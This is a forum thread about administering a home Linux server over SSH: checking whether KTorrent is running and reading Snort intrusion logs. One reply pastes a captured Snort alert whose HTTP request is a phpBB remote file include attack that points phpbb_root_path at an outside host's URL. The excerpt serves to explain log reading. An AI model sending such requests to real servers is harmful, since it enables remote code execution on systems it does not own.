I enabled SSHD on my linux box and I used putty from my windows box to connect to it. I dropped into a shell. All well an fine until this! This is my server which runs all the time and I would like to check up on it from time to time if it is all working properly from basically any place in the world.
My question is if it is posible to do all administrative tasks from the shell. I have not used it hat much so I wonder how would I check for instance if Ktorrent is working fine of take a look at snort logs?
SSHD on my linux box!
- Lyecdevf
- cyber Idi Amin
- Posts: 1222
- Joined: 16 Mar 2006, 17:00
- 18
- Location: In between life and death.
- Contact:
SSHD on my linux box!
We will either find a way, or make one.
- Hannibal
- Hannibal
Well you do like you would normally do when working in a shell. I don't know if Ktorrent has anything else available then a GUI (never used it), but analysing snort logs should be just like usually. Just navigate to the log directory and check them.
I don't remember where the snort logs are placed, /var/log/snort maybe, but you would just have to nav to that folder and read them with an editor/reader of your choice, cat/vi/nano/emacs.
I don't remember where the snort logs are placed, /var/log/snort maybe, but you would just have to nav to that folder and read them with an editor/reader of your choice, cat/vi/nano/emacs.
"The best place to hide a tree, is in a forest"
See if a process is running:
or
I've never used snort, but I'm sure it can export logs to a plain text format, which you could then read with any command line text editor such as emacs.
All administrative tasks should be doable from the shell.
Code: Select all
pgrep ktorrent
Code: Select all
ps aux | grep ktorrent
All administrative tasks should be doable from the shell.
I <3 MariaLara more than all of you
- bad_brain
- Site Owner
- Posts: 11636
- Joined: 06 Apr 2005, 16:00
- 19
- Location: In your eye floaters.
- Contact:
the snort logs are well readable in a shell, the logs are usually split into 2 parts: the alert log and the tcpdump log.
here is an example:
alert.log entry
and here the tcpdump entry for the same incident
snort also has a mail notification that send you a summary of all incidents happended in the last 24 hours. if you prefer a shiny GUI check out snortalog, it converts the logs into HTML-format (but you have to use the "FULL" log format in the snort settings for it if I remember it right).
I recommend to work as much as possible in a shell anyway, best way to learn...
here is an example:
alert.log entry
Code: Select all
[**] [1:2002:7] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
07/14-18:21:54.627780 216.227.218.118:52707 -> xxx.xxx.xxx.xxx:80
TCP TTL:51 TOS:0x8 ID:17524 IpLen:20 DgmLen:266 DF
***AP*** Seq: 0x7615CECD Ack: 0xF3F481D9 Win: 0x16D0 TcpLen: 20
Code: Select all
GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://knightkittens.com/images/ma??? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxxxxxx.com
User-Agent: Mozilla/4.61 [en] (OS/2; U)
I recommend to work as much as possible in a shell anyway, best way to learn...
- Lyecdevf
- cyber Idi Amin
- Posts: 1222
- Joined: 16 Mar 2006, 17:00
- 18
- Location: In between life and death.
- Contact:
Hey, thanks a lot.
lyecdevf@linux:~> pgrep ktorrent
4037
lyecdevf@linux:~> ps aux | grep ktorrent
lyecdevf 4037 7.8 24.1 417608 250280 ? Dl Jul05 1050:23 ktorrent --icon=ktorrent -caption KTorrent
lyecdevf 6631 0.0 0.0 1764 552 pts/2 S+ 19:45 0:00 grep ktorrent
lyecdevf@linux:~>
lyecdevf@linux:~> pgrep ktorrent
4037
lyecdevf@linux:~> ps aux | grep ktorrent
lyecdevf 4037 7.8 24.1 417608 250280 ? Dl Jul05 1050:23 ktorrent --icon=ktorrent -caption KTorrent
lyecdevf 6631 0.0 0.0 1764 552 pts/2 S+ 19:45 0:00 grep ktorrent
lyecdevf@linux:~>
We will either find a way, or make one.
- Hannibal
- Hannibal